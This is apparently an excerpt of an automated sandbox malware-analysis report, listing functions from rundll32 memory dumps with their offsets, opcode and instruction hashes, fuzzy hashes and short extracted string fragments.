                                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000003.1680772313.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_3_6df0000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 0aa828ce6e99f62fd275ff536cfa48833704376cb2a016acc5804b59e253b8cc
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 5726b13587c54233f7a242704dfe97eb30c06cf727e0d29f8e32a8c3ba2da8c3
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0aa828ce6e99f62fd275ff536cfa48833704376cb2a016acc5804b59e253b8cc
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C3F0A735725310578BB85F97A8C4F3B77DAEFC8750B068029EF0883244DA24CA0195B4
                                                                                                                                                                                                                                                                                                                                    Function 06DF25D1 Relevance: .0, Instructions: 34COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000003.1680772313.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_3_6df0000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 5f7a6bea7b2fe21816825918218e5a2864994f5f599a246282fb44a661076339
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: dad465469bbaec8eb0f59577ab3063e24511700f8d16e774a8c40b6f5a8d0538
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5f7a6bea7b2fe21816825918218e5a2864994f5f599a246282fb44a661076339
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 74F0B436A14184DBCB1C8B68E4196EEBBB2DFC9224F24807ED88263384EF350919C790
                                                                                                                                                                                                                                                                                                                                    Function 06DF2654 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000003.1680772313.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_3_6df0000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 77588d10f396ca5eaa92eba382d61fd9ecbdd88c590e915cf6b399ebd15a4b4a
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: b3ca7a0b1652cef2d56369007f8c9b9be3083db6ba67329dc8d649c44420154f
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 77588d10f396ca5eaa92eba382d61fd9ecbdd88c590e915cf6b399ebd15a4b4a
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1DE01220B3431917EBF827E999107A77ACE8B55758F020C39DF42CB649D9D4EA4503F1
                                                                                                                                                                                                                                                                                                                                    Function 06DF25E0 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000003.1680772313.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_3_6df0000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 0855b121ab96e69ac63b5878e70b7ce7524ef93b363b954310bd4234491e181b
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 15bd92d1693765c01dc6070929c9db1639bd4006418c25199e949f74078bbe85
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0855b121ab96e69ac63b5878e70b7ce7524ef93b363b954310bd4234491e181b
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4AE0E536F141149BCF089668E4194EDB7BADBC8210B118036D902A3344EF305D19CBD0
                                                                                                                                                                                                                                                                                                                                    Function 06DF17F0 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000003.1680772313.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_3_6df0000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 6e284c85fdba9e177c8fefc81cbe01b6061b5ab27ab4bf6f930693ce1e4452ef
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 69f8eed5d3ccd3bdd6e3e95c1fd70c9f74ca5e86679d8d23da1047789e116278
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6e284c85fdba9e177c8fefc81cbe01b6061b5ab27ab4bf6f930693ce1e4452ef
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1AE0C23211C244AFC3062F59D825496BFB8EF1A2203154067EDC087262DE651D11C7E5
                                                                                                                                                                                                                                                                                                                                    Function 06DF2590 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000003.1680772313.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_3_6df0000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: ae6cb7b4507d7e10a223d5dc3007b11d5ee0bb18198dbdee400731b3e2109a10
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: b6ad9a4fc024185dc60e773f5d4c320f9f10c046b1372f35808fdf74f9e8562c
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ae6cb7b4507d7e10a223d5dc3007b11d5ee0bb18198dbdee400731b3e2109a10
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0AE08C3010A300CFC7026FBDE8155C5BFA1DF422103468DBBD8C18B22AEE60598D87E5
                                                                                                                                                                                                                                                                                                                                    Function 06DF2A58 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000003.1680772313.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_3_6df0000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: c89f231214ae3b5f11ff4547991ea5dc7e728045b40e56bec632b1cbecaf5de8
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: abb4872cbd46e5ba993b92a7bb057f73f377417a973565fb3f35a5e3ba1ff011
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c89f231214ae3b5f11ff4547991ea5dc7e728045b40e56bec632b1cbecaf5de8
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3BE01270D142099F8780EFBD850155ABBF4FB48604B1085ADD54CD7204F7329602CBD1
                                                                                                                                                                                                                                                                                                                                    Function 06DF0C0C Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000003.1680772313.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_3_6df0000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 0c41015f79584d50d353f29075015d9fb0509c12240cfe8266a04b876d497355
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 330748c654e70534abcf76bf7e5cb6952e148e3e75c7a859064d4816e1bf24d1
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0c41015f79584d50d353f29075015d9fb0509c12240cfe8266a04b876d497355
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8DD0A732224118AB47846718DD5586ABBA9EB842613514433FB0383328CD61AC5083E9
                                                                                                                                                                                                                                                                                                                                    Function 06DF1C29 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000003.1680772313.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_3_6df0000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 57fd0e562aa46767d5a94a7de4c8772fa7f031f9cc4b7f433a2659c5316a7d19
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 1ad72403a119e1f85b4e31cd253ff9cd505e34da36ad09f904897c2a8f35e256
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 57fd0e562aa46767d5a94a7de4c8772fa7f031f9cc4b7f433a2659c5316a7d19
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F0D02226A2F2B536978613782D104D6EB048F46A20B1309F7D128DB50280074C04C2F2
                                                                                                                                                                                                                                                                                                                                    Function 06DF0F50 Relevance: .0, Instructions: 13COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000003.1680772313.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_3_6df0000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 9eaa890d1457e0d35bdbc377b0ed582639860c0a934b54b84afee90a5ba62b36
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: f6480cf91164e98d3533d495f6d4599238c3edb1be81693718437c3aa7c03650
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9eaa890d1457e0d35bdbc377b0ed582639860c0a934b54b84afee90a5ba62b36
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 19C08C30EB0208CEDAC03B666E3833AB58D9B81604F4228246B0FCA20CCC65E4400188
                                                                                                                                                                                                                                                                                                                                    Function 06DF0440 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000003.1680772313.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_3_6df0000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 07ab9f0f2de305eef8631ab3d8e8aece64f7be3d1d3a76fe0d106f11b44ade81
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 6f051cab9959bbeadeaada1519faf349e44ef085ca8f93b5413e6bb06db4149c
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 07ab9f0f2de305eef8631ab3d8e8aece64f7be3d1d3a76fe0d106f11b44ade81
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1CD0123500E3809FC7134B649C46C86BF716E5230435942AAF4C095012C6290D54C371
                                                                                                                                                                                                                                                                                                                                    Function 06DF0E7C Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000003.1680772313.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_3_6df0000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 92a0e4d8d1014bcf95efb5972b84ecb90a4cb8811ea0f8c40b8c6639dc2bd022
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 5f65cde6f8265e6a8bfa04a1ae7f75e8c2bc133aeb0af10bcfe385c4e851673f
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 92a0e4d8d1014bcf95efb5972b84ecb90a4cb8811ea0f8c40b8c6639dc2bd022
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B1B01215964001D656C0A7354CF04B680D2DAC2300BC1DC502B039811D4C58C0040018

                                                                                                                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                                                                                                                    Function 06E30040 Relevance: 1.7, Strings: 1, Instructions: 471COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000003.1731356894.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_3_6e30000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID: \;kq
                                                                                                                                                                                                                                                                                                                                    • API String ID: 0-699045553
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: e348f3eb57bb75b9c53d7970df735b222e59288e01a0b3a386a5c1657b8ea71f
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: f068d089c210fd106d23d40935da1ceeeb10ff642d2ade691eed16324d90fac4
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e348f3eb57bb75b9c53d7970df735b222e59288e01a0b3a386a5c1657b8ea71f
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FB226D30E1031ACFDB14DF78C85469DB7B2FF89304F1192A9D946AB351EB74A985CB90
                                                                                                                                                                                                                                                                                                                                    Function 06D4746A Relevance: 20.9, Strings: 16, Instructions: 920COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000003.1731306609.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_3_6d40000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID: mq$$&lq$(_kq$4'kq$4'kq$4'kq$4'kq$4ckq$4ckq$@bkq$|-lq$$kq$$kq$ckq$ckq$mq
                                                                                                                                                                                                                                                                                                                                    • API String ID: 0-2673231897
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: f5396bc4f2d10dc718b3f9afe917025bb2d7fbed3ae867612e479544d3101039
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 2e7894f4fe08b4f5cd377b3bb3806cdae5f13cfe690d5a578dfc0698c4f8a8af
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f5396bc4f2d10dc718b3f9afe917025bb2d7fbed3ae867612e479544d3101039
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A0A2F670A4021D9FDB259F60C950AEEBBB2BF49300F1045EAD5096B3A4DB399E85CF91
                                                                                                                                                                                                                                                                                                                                    Function 06D474C0 Relevance: 20.9, Strings: 16, Instructions: 867COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000003.1731306609.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_3_6d40000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID: mq$$&lq$(_kq$4'kq$4'kq$4'kq$4'kq$4ckq$4ckq$@bkq$|-lq$$kq$$kq$ckq$ckq$mq
                                                                                                                                                                                                                                                                                                                                    • API String ID: 0-2673231897
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: ae950bf5850d261666ba68be69c7df59947cda477eb9162d3794a3e28f6f0976
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 6a5d5f2e9b535cedd8de6d23dcf428f42a5060fa98a9ca99590e7178b0d00f6c
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ae950bf5850d261666ba68be69c7df59947cda477eb9162d3794a3e28f6f0976
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8D92D670A4021DDFDB259FA0C954AEEBBB2BF49300F1045E9D5096B364DB3A9E85CF81
                                                                                                                                                                                                                                                                                                                                    Function 06D4B688 Relevance: 4.0, Strings: 3, Instructions: 225COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000003.1731306609.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_3_6d40000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID: (oq$\;kq$|jq
                                                                                                                                                                                                                                                                                                                                    • API String ID: 0-3241521890
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: ba046fa36d517db3fe88a018bdb2f5663285c04dd5f07a03cad5d6d86686ca21
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: a68fc180f3675044c45281a6f7e76a2b54b149e8a85fbfc3f3d1df9ee745a6e4
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ba046fa36d517db3fe88a018bdb2f5663285c04dd5f07a03cad5d6d86686ca21
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B361A475F442174FDB54AB6A895067FB6ABBFE4340B24802BD905D73A8EE34DC0287A1
                                                                                                                                                                                                                                                                                                                                    Function 06D4BAD8 Relevance: 3.9, Strings: 3, Instructions: 192COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000003.1731306609.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_3_6d40000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID: (oq$(oq$(oq
                                                                                                                                                                                                                                                                                                                                    • API String ID: 0-3965398577
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 7345e3edb35a052bc53c96c6c070dd8fd4dc833449248c96e4f239005379c65a
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 1306b9a17d2918860bb4f626143c908c558aadf9c91adeae51e7b6097063ed66
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7345e3edb35a052bc53c96c6c070dd8fd4dc833449248c96e4f239005379c65a
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9751C131B001198FDB54EF7DD484A6E7BEAEF9935071580AAE905CB3A1EE31ED01CB91
                                                                                                                                                                                                                                                                                                                                    Function 06D485C0 Relevance: 2.9, Strings: 2, Instructions: 438COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000003.1731306609.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_3_6d40000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID: (oq$d
                                                                                                                                                                                                                                                                                                                                    • API String ID: 0-886291620
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 9d054ab5066e4f1a88c62623ac9ca798a9a1eccd97f869745264a6b8be97cba5
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: b920a935ec71c34e9034793336f69faf84396e6dac8fcadf6611695e0c07bc09
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9d054ab5066e4f1a88c62623ac9ca798a9a1eccd97f869745264a6b8be97cba5
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F7028934A006058FDB50DF19C48096AFBF2FF89354B29CA69D46A9B365DB30FC46DB90
                                                                                                                                                                                                                                                                                                                                    Function 06D41630 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000003.1731306609.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_3_6d40000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID: $kq$$kq
                                                                                                                                                                                                                                                                                                                                    • API String ID: 0-3550614674
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 4463f49133ffd208abea8f5e32ce36cf8ffdc71fb0fab0957f88e806d42fb619
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: a93db1c3190616a6292ac861bb00854857e7e2c385ad8b8db029bb0f869563e8
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4463f49133ffd208abea8f5e32ce36cf8ffdc71fb0fab0957f88e806d42fb619
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DE51AD31B042498FCB55EF78DD506AEBBFAFF89250B14852AE914D7364DA30DD42CBA0
                                                                                                                                                                                                                                                                                                                                    Function 06D4A228 Relevance: 2.6, Strings: 2, Instructions: 136COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000003.1731306609.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_3_6d40000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID: (oq$(oq
                                                                                                                                                                                                                                                                                                                                    • API String ID: 0-3207256227
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: d09e298c8ece243d32c218f1e594e51db3108fa81616c5580b2f5772a0d87de9
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 4f073a9d3bb6065a36a6440501c919f220c9d9e3d00f557c6f018445895e907b
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d09e298c8ece243d32c218f1e594e51db3108fa81616c5580b2f5772a0d87de9
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3041F630B442489FD755DF65C894B9EBFF2EF89210F288099D845AB395DB35ED02CB90
                                                                                                                                                                                                                                                                                                                                    Function 06D430EC Relevance: 2.6, Strings: 2, Instructions: 136COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000003.1731306609.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_3_6d40000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID: (oq$LRkq
                                                                                                                                                                                                                                                                                                                                    • API String ID: 0-3710894217
